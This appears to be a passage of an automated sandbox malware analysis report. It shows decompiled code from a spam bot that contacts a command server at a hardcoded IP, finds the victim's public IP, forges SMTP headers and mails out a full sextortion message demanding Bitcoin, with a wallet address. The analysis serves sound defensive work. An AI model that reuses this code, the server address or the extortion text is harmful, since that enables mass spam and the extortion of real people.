                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4A61E5F0900218DACB14CFC5D845AEDBBF5AFDE305F209149E505BF294E7B86A84CB60
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    C-Code - Quality: 50%
                                                                                                                                                                                                                                                                                    			E00EA26A0() {
                                                                                                                                                                                                                                                                                    				short _v524;
                                                                                                                                                                                                                                                                                    				struct _SECURITY_ATTRIBUTES* _v528;
                                                                                                                                                                                                                                                                                    				void _v796;
                                                                                                                                                                                                                                                                                    				short _v1316;
                                                                                                                                                                                                                                                                                    				char _v1716;
                                                                                                                                                                                                                                                                                    				void* _v1720;
                                                                                                                                                                                                                                                                                    				void* _t10;
                                                                                                                                                                                                                                                                                    				signed char _t17;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				Sleep(0x7d0); // executed
                                                                                                                                                                                                                                                                                    				_t10 = CreateMutexA(0, 0, "759498"); // executed
                                                                                                                                                                                                                                                                                    				_v1720 = _t10;
                                                                                                                                                                                                                                                                                    				if(GetLastError() == 0xb7) {
                                                                                                                                                                                                                                                                                    					ExitProcess(0);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_v528 = 0;
                                                                                                                                                                                                                                                                                    				GetModuleFileNameW(0,  &_v524, 0x104);
                                                                                                                                                                                                                                                                                    				wsprintfW( &_v1316, L"%s:Zone.Identifier",  &_v524);
                                                                                                                                                                                                                                                                                    				DeleteFileW( &_v1316); // executed
                                                                                                                                                                                                                                                                                    				__imp__#115(0x202,  &_v1716); // executed
                                                                                                                                                                                                                                                                                    				_t17 = E00EA1760(); // executed
                                                                                                                                                                                                                                                                                    				if((_t17 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                                    					ExitProcess(0);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				Sleep(0x64); // executed
                                                                                                                                                                                                                                                                                    				wsprintfA( &_v796, "%s", E00EA1000("http://185.215.113.66/from/"));
                                                                                                                                                                                                                                                                                    				CreateThread(0, 0, E00EA23B0,  &_v796, 0, 0); // executed
                                                                                                                                                                                                                                                                                    				while(1 != 0) {
                                                                                                                                                                                                                                                                                    					Sleep(0xcdfe600); // executed
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return 0;
                                                                                                                                                                                                                                                                                    			}











                                                                                                                                                                                                                                                                                    0x00ea26ae
                                                                                                                                                                                                                                                                                    0x00ea26bd
                                                                                                                                                                                                                                                                                    0x00ea26c3
                                                                                                                                                                                                                                                                                    0x00ea26d4
                                                                                                                                                                                                                                                                                    0x00ea26d8
                                                                                                                                                                                                                                                                                    0x00ea26d8
                                                                                                                                                                                                                                                                                    0x00ea26de
                                                                                                                                                                                                                                                                                    0x00ea26f6
                                                                                                                                                                                                                                                                                    0x00ea270f
                                                                                                                                                                                                                                                                                    0x00ea271f
                                                                                                                                                                                                                                                                                    0x00ea2731
                                                                                                                                                                                                                                                                                    0x00ea2737
                                                                                                                                                                                                                                                                                    0x00ea2741
                                                                                                                                                                                                                                                                                    0x00ea2745
                                                                                                                                                                                                                                                                                    0x00ea2745
                                                                                                                                                                                                                                                                                    0x00ea274d
                                                                                                                                                                                                                                                                                    0x00ea276d
                                                                                                                                                                                                                                                                                    0x00ea278a
                                                                                                                                                                                                                                                                                    0x00ea2790
                                                                                                                                                                                                                                                                                    0x00ea279e
                                                                                                                                                                                                                                                                                    0x00ea279e
                                                                                                                                                                                                                                                                                    0x00ea27ab

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • Sleep.KERNELBASE(000007D0), ref: 00EA26AE
                                                                                                                                                                                                                                                                                    • CreateMutexA.KERNELBASE(00000000,00000000,759498), ref: 00EA26BD
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00EA26C9
                                                                                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00EA26D8
                                                                                                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00EA26F6
                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 00EA270F
                                                                                                                                                                                                                                                                                    • DeleteFileW.KERNELBASE(?), ref: 00EA271F
                                                                                                                                                                                                                                                                                    • WSAStartup.WS2_32(00000202,?), ref: 00EA2731
                                                                                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00EA2745
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.892724043.0000000000EA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.892708963.0000000000EA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.892732980.0000000000EA4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.892759245.0000000000EA6000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.892764370.0000000000EA7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_ea0000_1925824589.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ExitFileProcess$CreateDeleteErrorLastModuleMutexNameSleepStartupwsprintf
                                                                                                                                                                                                                                                                                    • String ID: %s:Zone.Identifier$759498$http://185.215.113.66/from/
                                                                                                                                                                                                                                                                                    • API String ID: 3138769648-2759999156
                                                                                                                                                                                                                                                                                    • Opcode ID: e2ebbb8d8d77cd45e090b758d43914553123b5fab1d2bbbca6c4700a3e10f858
                                                                                                                                                                                                                                                                                    • Instruction ID: f8901c4113babd2458747d0dbbb658163b490d11fcf033c0e08ca2b6fb2ad666
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e2ebbb8d8d77cd45e090b758d43914553123b5fab1d2bbbca6c4700a3e10f858
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1E21A1B1A40308AFE7105BA1DC4EF9A7775AB9E702F004455F709B90D1DBF075989E52
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                    			E00EA17D0() {
                                                                                                                                                                                                                                                                                    				void _v108;
                                                                                                                                                                                                                                                                                    				long _v112;
                                                                                                                                                                                                                                                                                    				void* _v116;
                                                                                                                                                                                                                                                                                    				void* _v120;
                                                                                                                                                                                                                                                                                    				void* _t15;
                                                                                                                                                                                                                                                                                    				void* _t21;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t15 = InternetOpenA("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36", 0, 0, 0, 0); // executed
                                                                                                                                                                                                                                                                                    				_v120 = _t15;
                                                                                                                                                                                                                                                                                    				if(_v120 == 0) {
                                                                                                                                                                                                                                                                                    					wsprintfA("[102.129.143.99]", "[0.0.0.0]");
                                                                                                                                                                                                                                                                                    					L8:
                                                                                                                                                                                                                                                                                    					InternetCloseHandle(_v120);
                                                                                                                                                                                                                                                                                    					return "[102.129.143.99]";
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_t21 = InternetOpenUrlA(_v120, "http://icanhazip.com/", 0, 0, 0, 0); // executed
                                                                                                                                                                                                                                                                                    				_v116 = _t21;
                                                                                                                                                                                                                                                                                    				if(_v116 != 0) {
                                                                                                                                                                                                                                                                                    					InternetReadFile(_v116,  &_v108, 0x63,  &_v112); // executed
                                                                                                                                                                                                                                                                                    					if( &_v108 != 0) {
                                                                                                                                                                                                                                                                                    						if(E00EA18B0( &_v108, ".") == 0) {
                                                                                                                                                                                                                                                                                    							wsprintfA("[102.129.143.99]", "[0.0.0.0]");
                                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                                    							E00EA1400( &_v108);
                                                                                                                                                                                                                                                                                    							wsprintfA("[102.129.143.99]", "[%s]",  &_v108);
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				InternetCloseHandle(_v116); // executed
                                                                                                                                                                                                                                                                                    				goto L8;
                                                                                                                                                                                                                                                                                    			}









                                                                                                                                                                                                                                                                                    0x00ea17e3
                                                                                                                                                                                                                                                                                    0x00ea17e9
                                                                                                                                                                                                                                                                                    0x00ea17f0
                                                                                                                                                                                                                                                                                    0x00ea1894
                                                                                                                                                                                                                                                                                    0x00ea189d
                                                                                                                                                                                                                                                                                    0x00ea18a1
                                                                                                                                                                                                                                                                                    0x00ea18af
                                                                                                                                                                                                                                                                                    0x00ea18af
                                                                                                                                                                                                                                                                                    0x00ea1807
                                                                                                                                                                                                                                                                                    0x00ea180d
                                                                                                                                                                                                                                                                                    0x00ea1814
                                                                                                                                                                                                                                                                                    0x00ea1824
                                                                                                                                                                                                                                                                                    0x00ea182f
                                                                                                                                                                                                                                                                                    0x00ea1844
                                                                                                                                                                                                                                                                                    0x00ea1875
                                                                                                                                                                                                                                                                                    0x00ea1846
                                                                                                                                                                                                                                                                                    0x00ea184a
                                                                                                                                                                                                                                                                                    0x00ea1860
                                                                                                                                                                                                                                                                                    0x00ea1866
                                                                                                                                                                                                                                                                                    0x00ea1844
                                                                                                                                                                                                                                                                                    0x00ea182f
                                                                                                                                                                                                                                                                                    0x00ea1882
                                                                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36,00000000,00000000,00000000,00000000), ref: 00EA17E3
                                                                                                                                                                                                                                                                                    • InternetOpenUrlA.WININET(00000000,http://icanhazip.com/,00000000,00000000,00000000,00000000), ref: 00EA1807
                                                                                                                                                                                                                                                                                    • InternetReadFile.WININET(00000000,?,00000063,?), ref: 00EA1824
                                                                                                                                                                                                                                                                                      • Part of subcall function 00EA18B0: strstr.MSVCR90 ref: 00EA18BB
                                                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 00EA1860
                                                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 00EA1875
                                                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00EA1882
                                                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 00EA1894
                                                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(?), ref: 00EA18A1
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.892724043.0000000000EA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.892708963.0000000000EA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.892732980.0000000000EA4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.892759245.0000000000EA6000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.892764370.0000000000EA7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_ea0000_1925824589.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Internet$wsprintf$CloseHandleOpen$FileReadstrstr
                                                                                                                                                                                                                                                                                    • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36$[%s]$[0.0.0.0]$[0.0.0.0]$[102.129.143.99]$http://icanhazip.com/
                                                                                                                                                                                                                                                                                    • API String ID: 2936383407-2470265312
                                                                                                                                                                                                                                                                                    • Opcode ID: 45333213750d6ae7f10844dbfa53d76975d22dbc6ad71b34babb55eac0b39af8
                                                                                                                                                                                                                                                                                    • Instruction ID: bcc31ac4a236a4154bfe91d9ad4755da4a8cbc93ae8fc960dc9271cbf4aff04c
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 45333213750d6ae7f10844dbfa53d76975d22dbc6ad71b34babb55eac0b39af8
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E8218CB0A40308ABDB249BE59C4AF9D7A34ABAFB05F241118B505BB1C1E7B47548CA51
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    C-Code - Quality: 91%
                                                                                                                                                                                                                                                                                    			E00EA1CAB(void* __eflags) {
                                                                                                                                                                                                                                                                                    				signed int _t171;
                                                                                                                                                                                                                                                                                    				signed int _t173;
                                                                                                                                                                                                                                                                                    				signed int _t175;
                                                                                                                                                                                                                                                                                    				signed int _t177;
                                                                                                                                                                                                                                                                                    				void* _t183;
                                                                                                                                                                                                                                                                                    				void* _t184;
                                                                                                                                                                                                                                                                                    				void* _t189;
                                                                                                                                                                                                                                                                                    				void* _t193;
                                                                                                                                                                                                                                                                                    				void* _t196;
                                                                                                                                                                                                                                                                                    				void* _t200;
                                                                                                                                                                                                                                                                                    				void* _t203;
                                                                                                                                                                                                                                                                                    				void* _t205;
                                                                                                                                                                                                                                                                                    				void* _t210;
                                                                                                                                                                                                                                                                                    				void* _t211;
                                                                                                                                                                                                                                                                                    				void* _t212;
                                                                                                                                                                                                                                                                                    				void* _t229;
                                                                                                                                                                                                                                                                                    				void* _t244;
                                                                                                                                                                                                                                                                                    				intOrPtr _t248;
                                                                                                                                                                                                                                                                                    				void* _t249;
                                                                                                                                                                                                                                                                                    				void* _t329;
                                                                                                                                                                                                                                                                                    				void* _t331;
                                                                                                                                                                                                                                                                                    				void* _t338;
                                                                                                                                                                                                                                                                                    				void* _t342;
                                                                                                                                                                                                                                                                                    				void* _t344;
                                                                                                                                                                                                                                                                                    				void* _t346;
                                                                                                                                                                                                                                                                                    				void* _t348;
                                                                                                                                                                                                                                                                                    				void* _t350;
                                                                                                                                                                                                                                                                                    				void* _t354;
                                                                                                                                                                                                                                                                                    				void* _t355;
                                                                                                                                                                                                                                                                                    				void* _t356;
                                                                                                                                                                                                                                                                                    				void* _t368;
                                                                                                                                                                                                                                                                                    				void* _t380;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				L0:
                                                                                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                                                                                    					L0:
                                                                                                                                                                                                                                                                                    					wsprintfA(_t329 - 0x508, "%s.com", E00EA1320(_t329 - 0x61c, 5, _t329 - 0x61c));
                                                                                                                                                                                                                                                                                    					E00EA1490(0, _t329 - 0x710, 1); // executed
                                                                                                                                                                                                                                                                                    					Sleep(0x7d0); // executed
                                                                                                                                                                                                                                                                                    					E00EA1490(0, _t329 - 0x690, 0); // executed
                                                                                                                                                                                                                                                                                    					_t171 = rand();
                                                                                                                                                                                                                                                                                    					asm("cdq");
                                                                                                                                                                                                                                                                                    					_t173 = rand();
                                                                                                                                                                                                                                                                                    					asm("cdq");
                                                                                                                                                                                                                                                                                    					_t175 = rand();
                                                                                                                                                                                                                                                                                    					asm("cdq");
                                                                                                                                                                                                                                                                                    					_t177 = rand();
                                                                                                                                                                                                                                                                                    					asm("cdq");
                                                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t329 - 0x714)) = wsprintfA(_t329 - 0x490, "Received: from %s ([%d.%d.%d.%d]) by %s with MailEnable ESMTP; %s\r\n", E00EA1390(0xd2, 7, _t329 - 0x6a8), _t177 % 0xd2 + 1, _t175 % 0xfe + 1, _t173 % 0xfe + 1, _t171 % 0xfe + 1, _t329 - 0x508, _t329 - 0x690);
                                                                                                                                                                                                                                                                                    					_t183 = E00EA1120( *((intOrPtr*)(_t329 - 0x1c)), _t329 - 0x490,  *((intOrPtr*)(_t329 - 0x714))); // executed
                                                                                                                                                                                                                                                                                    					_t338 = _t331 + 0x64;
                                                                                                                                                                                                                                                                                    					if(_t183 != 0) {
                                                                                                                                                                                                                                                                                    						_t184 = E00EA1320(_t329 - 0x710, 3, _t329 - 0x628);
                                                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t329 - 0x714)) = wsprintfA(_t329 - 0x490, "Received: (qmail %s invoked by uid %s); %s\r\n", E00EA1320(_t329 - 0x710, 5, _t329 - 0x69c), _t184, _t329 - 0x710);
                                                                                                                                                                                                                                                                                    						_t189 = E00EA1120( *((intOrPtr*)(_t329 - 0x1c)), _t329 - 0x490,  *((intOrPtr*)(_t329 - 0x714))); // executed
                                                                                                                                                                                                                                                                                    						_t342 = _t338 + 0x30;
                                                                                                                                                                                                                                                                                    						if(_t189 != 0) {
                                                                                                                                                                                                                                                                                    							 *((intOrPtr*)(_t329 - 0x714)) = wsprintfA(_t329 - 0x490, "From: %s\r\n",  *((intOrPtr*)(_t329 + 8)));
                                                                                                                                                                                                                                                                                    							_t193 = E00EA1120( *((intOrPtr*)(_t329 - 0x1c)), _t329 - 0x490,  *((intOrPtr*)(_t329 - 0x714))); // executed
                                                                                                                                                                                                                                                                                    							_t344 = _t342 + 0x18;
                                                                                                                                                                                                                                                                                    							if(_t193 != 0) {
                                                                                                                                                                                                                                                                                    								 *((intOrPtr*)(_t329 - 0x714)) = wsprintfA(_t329 - 0x490, "To: %s\r\n",  *((intOrPtr*)(_t329 + 8)));
                                                                                                                                                                                                                                                                                    								_t196 = E00EA1120( *((intOrPtr*)(_t329 - 0x1c)), _t329 - 0x490,  *((intOrPtr*)(_t329 - 0x714)));
                                                                                                                                                                                                                                                                                    								_t346 = _t344 + 0x18;
                                                                                                                                                                                                                                                                                    								if(_t196 != 0) {
                                                                                                                                                                                                                                                                                    									 *((intOrPtr*)(_t329 - 0x714)) = wsprintfA(_t329 - 0x490, "Subject: %s\r\n", "I RECORDED YOU!");
                                                                                                                                                                                                                                                                                    									_t200 = E00EA1120( *((intOrPtr*)(_t329 - 0x1c)), _t329 - 0x490,  *((intOrPtr*)(_t329 - 0x714))); // executed
                                                                                                                                                                                                                                                                                    									_t348 = _t346 + 0x18;
                                                                                                                                                                                                                                                                                    									if(_t200 != 0) {
                                                                                                                                                                                                                                                                                    										 *((intOrPtr*)(_t329 - 0x714)) = wsprintfA(_t329 - 0x490, "Date: %s\r\n", _t329 - 0x690);
                                                                                                                                                                                                                                                                                    										_t203 = E00EA1120( *((intOrPtr*)(_t329 - 0x1c)), _t329 - 0x490,  *((intOrPtr*)(_t329 - 0x714))); // executed
                                                                                                                                                                                                                                                                                    										_t350 = _t348 + 0x18;
                                                                                                                                                                                                                                                                                    										if(_t203 != 0) {
                                                                                                                                                                                                                                                                                    											_t205 = E00EA1320(_t329 - 0x628, 6, _t329 - 0x628);
                                                                                                                                                                                                                                                                                    											 *((intOrPtr*)(_t329 - 0x714)) = wsprintfA(_t329 - 0x490, "Message-ID: <%s.%s@%s>\r\n", E00EA1320(_t329 - 0x628, 6, _t329 - 0x69c), _t205, _t329 - 0x508);
                                                                                                                                                                                                                                                                                    											_t210 = E00EA1120( *((intOrPtr*)(_t329 - 0x1c)), _t329 - 0x490,  *((intOrPtr*)(_t329 - 0x714))); // executed
                                                                                                                                                                                                                                                                                    											_t354 = _t350 + 0x30;
                                                                                                                                                                                                                                                                                    											if(_t210 != 0) {
                                                                                                                                                                                                                                                                                    												_t211 = E00EA1120( *((intOrPtr*)(_t329 - 0x1c)), "Mime-Version: 1.0\r\n", 0xffffffff);
                                                                                                                                                                                                                                                                                    												_t355 = _t354 + 0xc;
                                                                                                                                                                                                                                                                                    												if(_t211 != 0) {
                                                                                                                                                                                                                                                                                    													_t212 = E00EA1120( *((intOrPtr*)(_t329 - 0x1c)), "Content-type: text/plain;\r\n\r\n", 0xffffffff); // executed
                                                                                                                                                                                                                                                                                    													_t356 = _t355 + 0xc;
                                                                                                                                                                                                                                                                                    													if(_t212 != 0) {
                                                                                                                                                                                                                                                                                    														memset(_t329 - 0x610, 0, 0x104);
                                                                                                                                                                                                                                                                                    														strcpy(_t329 - 0x610, "Hello there!\r\n\r\n");
                                                                                                                                                                                                                                                                                    														strcat(_t329 - 0x610, "Unfortunately, there are some bad news for you.\r\n\r\n");
                                                                                                                                                                                                                                                                                    														strcat(_t329 - 0x610, "Some time ago your device was infected with my private trojan, R.A.T (Remote Administration Tool), if you want to find out more about it simply use Google.\r\n\r\n");
                                                                                                                                                                                                                                                                                    														strcat(_t329 - 0x610, "My trojan allows me to access your accounts, your camera and microphone.\r\n\r\n");
                                                                                                                                                                                                                                                                                    														strcat(_t329 - 0x610, "Check the sender of this email, I have sent it from your email account.\r\n\r\n");
                                                                                                                                                                                                                                                                                    														strcat(_t329 - 0x610, "You truly enjoy checking out porn websites and watching dirty videos, while having a lot of kinky fun.\r\n\r\n");
                                                                                                                                                                                                                                                                                    														strcat(_t329 - 0x610, "I RECORDED YOU (through your camera) SATISFYING YOURSELF!\r\n\r\n");
                                                                                                                                                                                                                                                                                    														strcat(_t329 - 0x610, "If you still doubt my serious intentions, it only takes couple mouse clicks to share the video of you with your friends, relatives, all email contacts and on social networks.\r\n\r\n");
                                                                                                                                                                                                                                                                                    														strcat(_t329 - 0x610, "All you need is $1400 USD in Bitcoin (BTC) transfer to my account (Bitcoin equivalent based on exchange rate during your transfer).\r\n\r\n");
                                                                                                                                                                                                                                                                                    														strcat(_t329 - 0x610, "After the transaction is successful, I will proceed to delete everything without delay.\r\n\r\n");
                                                                                                                                                                                                                                                                                    														_t229 = E00EA1120( *((intOrPtr*)(_t329 - 0x1c)), _t329 - 0x610, 0xffffffff); // executed
                                                                                                                                                                                                                                                                                    														_t368 = _t356 + 0x68;
                                                                                                                                                                                                                                                                                    														if(_t229 != 0) {
                                                                                                                                                                                                                                                                                    															memset(_t329 - 0x610, 0, 0x104);
                                                                                                                                                                                                                                                                                    															strcpy(_t329 - 0x610, "Afterwards, we can pretend that we have never met before.\r\n\r\n");
                                                                                                                                                                                                                                                                                    															strcat(_t329 - 0x610, "In addition, I assure you that all the harmful software will be deleted from your device.\r\n\r\n");
                                                                                                                                                                                                                                                                                    															strcat(_t329 - 0x610, "Be sure, I keep my promises!\r\n\r\n");
                                                                                                                                                                                                                                                                                    															strcat(_t329 - 0x610, "If you are unaware how to buy and send Bitcoin (BTC) - Google: Where to buy Bitcoin (BTC), to send and receive Bitcoin (BTC), you can register your wallet for example here: www.blockchain.com\r\n\r\n");
                                                                                                                                                                                                                                                                                    															strcat(_t329 - 0x610, "My Bitcoin (BTC) address is: 1EJJoUCykyZT3FtxRGSpuUsiBxCiHQ4wqX\r\n\r\n");
                                                                                                                                                                                                                                                                                    															strcat(_t329 - 0x610, "Yes, that\'s how the address looks like, copy and paste my address, it\'s (cAsE-sEnSEtiVE).\r\n\r\n");
                                                                                                                                                                                                                                                                                    															strcat(_t329 - 0x610, "You are given not more than 48 hours after you have opened this email (2 days to be precise).\r\n\r\n");
                                                                                                                                                                                                                                                                                    															strcat(_t329 - 0x610, "Everything will be carried out based on fairness!\r\n\r\n");
                                                                                                                                                                                                                                                                                    															strcat(_t329 - 0x610, "An advice from me - regularly change all your passwords to your accounts and update your device with newest security patches.\r\n.\r\n");
                                                                                                                                                                                                                                                                                    															_t244 = E00EA1120( *((intOrPtr*)(_t329 - 0x1c)), _t329 - 0x610, 0xffffffff);
                                                                                                                                                                                                                                                                                    															_t368 = _t368 + 0x60;
                                                                                                                                                                                                                                                                                    															if(_t244 != 0) {
                                                                                                                                                                                                                                                                                    																 *(_t329 - 0x20) = 7;
                                                                                                                                                                                                                                                                                    															} else {
                                                                                                                                                                                                                                                                                    																 *(_t329 - 0x20) = 0;
                                                                                                                                                                                                                                                                                    															}
                                                                                                                                                                                                                                                                                    														} else {
                                                                                                                                                                                                                                                                                    															 *(_t329 - 0x20) = 0;
                                                                                                                                                                                                                                                                                    														}
                                                                                                                                                                                                                                                                                    													} else {
                                                                                                                                                                                                                                                                                    														 *(_t329 - 0x20) = 0;
                                                                                                                                                                                                                                                                                    													}
                                                                                                                                                                                                                                                                                    												} else {
                                                                                                                                                                                                                                                                                    													 *(_t329 - 0x20) = 0;
                                                                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                                                                                                    												 *(_t329 - 0x20) = 0;
                                                                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                                                                                    											 *(_t329 - 0x20) = 0;
                                                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                                                                    										 *(_t329 - 0x20) = 0;
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                                                    									 *(_t329 - 0x20) = 0;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                                                    								 *(_t329 - 0x20) = 0;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                                    							 *(_t329 - 0x20) = 0;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					L48:
                                                                                                                                                                                                                                                                                    					while( *(_t329 - 0x20) != 0 &&  *(_t329 - 0x20) != 8) {
                                                                                                                                                                                                                                                                                    						_t248 = E00EA1160( *((intOrPtr*)(_t329 - 0x1c)), _t329 - 0x490, 0x400); // executed
                                                                                                                                                                                                                                                                                    						_t380 = _t368 + 0xc;
                                                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t329 - 0x90)) = _t248;
                                                                                                                                                                                                                                                                                    						if( *((intOrPtr*)(_t329 - 0x90)) != 0) {
                                                                                                                                                                                                                                                                                    							L5:
                                                                                                                                                                                                                                                                                    							 *((char*)(_t329 +  *((intOrPtr*)(_t329 - 0x90)) - 0x490)) = 0;
                                                                                                                                                                                                                                                                                    							_t249 = E00EA11C0(_t329 - 0x490);
                                                                                                                                                                                                                                                                                    							_t368 = _t380 + 4;
                                                                                                                                                                                                                                                                                    							if(_t249 != 0) {
                                                                                                                                                                                                                                                                                    								L7:
                                                                                                                                                                                                                                                                                    								 *(_t329 - 0x718) =  *(_t329 - 0x20);
                                                                                                                                                                                                                                                                                    								 *(_t329 - 0x718) =  *(_t329 - 0x718) - 1;
                                                                                                                                                                                                                                                                                    								if( *(_t329 - 0x718) > 6) {
                                                                                                                                                                                                                                                                                    									continue;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								L8:
                                                                                                                                                                                                                                                                                    								switch( *((intOrPtr*)( *(_t329 - 0x718) * 4 +  &M00EA223C))) {
                                                                                                                                                                                                                                                                                    									case 0:
                                                                                                                                                                                                                                                                                    										L9:
                                                                                                                                                                                                                                                                                    										_push("ESMTP");
                                                                                                                                                                                                                                                                                    										if(StrStrA(_t329 - 0x490) == 0) {
                                                                                                                                                                                                                                                                                    											_t253 = wsprintfA(_t329 - 0x490, "HELO %s\r\n", "[102.129.143.99]");
                                                                                                                                                                                                                                                                                    											_t381 = _t368 + 0xc;
                                                                                                                                                                                                                                                                                    											 *(_t329 - 0x494) = _t253;
                                                                                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                                                                                    											_t256 = wsprintfA(_t329 - 0x490, "EHLO %s\r\n", "[102.129.143.99]");
                                                                                                                                                                                                                                                                                    											_t381 = _t368 + 0xc;
                                                                                                                                                                                                                                                                                    											 *(_t329 - 0x494) = _t256;
                                                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                                                    										_t255 = E00EA1120( *((intOrPtr*)(_t329 - 0x1c)), _t329 - 0x490,  *(_t329 - 0x494)); // executed
                                                                                                                                                                                                                                                                                    										_t368 = _t381 + 0xc;
                                                                                                                                                                                                                                                                                    										if(_t255 != 0) {
                                                                                                                                                                                                                                                                                    											 *(_t329 - 0x20) = 3;
                                                                                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                                                                                    											 *(_t329 - 0x20) = 0;
                                                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                                                    										goto L48;
                                                                                                                                                                                                                                                                                    									case 1:
                                                                                                                                                                                                                                                                                    										goto L48;
                                                                                                                                                                                                                                                                                    									case 2:
                                                                                                                                                                                                                                                                                    										L16:
                                                                                                                                                                                                                                                                                    										__eax =  *(__ebp + 8);
                                                                                                                                                                                                                                                                                    										__ecx = __ebp - 0x88;
                                                                                                                                                                                                                                                                                    										__eax = wsprintfA(__ebp - 0x88, "<%s>",  *(__ebp + 8));
                                                                                                                                                                                                                                                                                    										__esp = __esp + 0xc;
